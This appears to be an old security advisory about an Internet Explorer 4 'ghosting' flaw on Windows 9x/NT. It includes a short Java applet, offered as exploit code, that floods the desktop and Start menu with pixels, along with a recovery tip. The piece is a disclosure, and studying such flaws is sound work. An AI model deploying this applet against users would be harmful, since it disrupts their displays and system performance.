COMMAND

    Internet Explorer (ghosting attack)

SYSTEMS AFFECTED

    Win 9x, NT

PROBLEM

    Brian Krahmer posted the following.  An Internet Explorer bug has
    been found.  Details can be found at:

        http://www.focus-asia.com/home/tjc/ghosting/

    Internet Explorer 4 has a flaw that allows an applet to write to
    its desktop or to other windows.  The following is a description
    (in sequence) of the ghosting attack, which is done by a test
    applet which draws a white (colour of a ghost; in the code below
    it was changed to black) image on the screen.  Here's the process:

        1. The victim visits the page
        2. The applet is loaded
        3. The applet fails to work.  The applet seems to be stuck  at
           the initialisation process
        4. The victim thinks that he/she has just loaded another badly
           coded applet
        5. The  victim  then  closes  the browser associated with  the
           "bad" applet
        6. The applet starts attacking the active window, the  desktop
           or Start menus, usually after the victim clicks a mouse
           button

    The following are the symptoms on Internet Explorer 4 on a Pentium
    PC (don't forget to change black to white!):

        - White pixels will flood the whole desktop
        - White pixels will flood the menu bar/Start button
        - White pixels will try to flood the active window, but not
          100% successfully
        - Victims may not see their mouse cursor.
        - Victims cannot see where they are clicking or where to click

    So, it basically only causes minor annoyances.  On NT4 SP3 with
    IE4 4.01 and Active Desktop, it caused explorer.exe (Windows
    Explorer) processor usage to go up to about 95%.  It is also
    effective on Windows without Active Desktop (at least 98
    4.10.1681).  Exploit code follows (white pixels changed to black):

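    // zealand.java - implements "ghosting" for IE with Active Desktop
    import java.applet.Applet;
    import java.awt.*;
    public class zealand extends Applet
    {
        // Record the applet's size once, then draw straight from init()
        public void init()
        { apd = size();
          draw();       }
        // paint() and update() both end up in flick()
        public void paint(Graphics g)
        { update(g);    }
        public void update(Graphics g)
        { flick(g);     }
        // Fetch the applet's Graphics context directly and draw twice
        private void draw()
        { Graphics g = getGraphics();
          update(g);
          update(g);    }
        // Fill an applet-sized rectangle at (0, 0); black here, white
        // in the original test applet
        private void flick(Graphics g)
        { g.setColor(Color.black);
          g.fillRect(0, 0, apd.width, apd.height);    }
        public zealand()
        {    }
        Dimension apd;  // applet dimensions captured in init()
        int x;          // unused
    }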

SOLUTION

    Those familiar with Windows will try to "end task" Explorer by
    using the famous CTRL+ALT+DEL.  However, most victims will restart
    their computer and have to wait for a patch.  Such victims should
    log off and log back in for a fast recovery.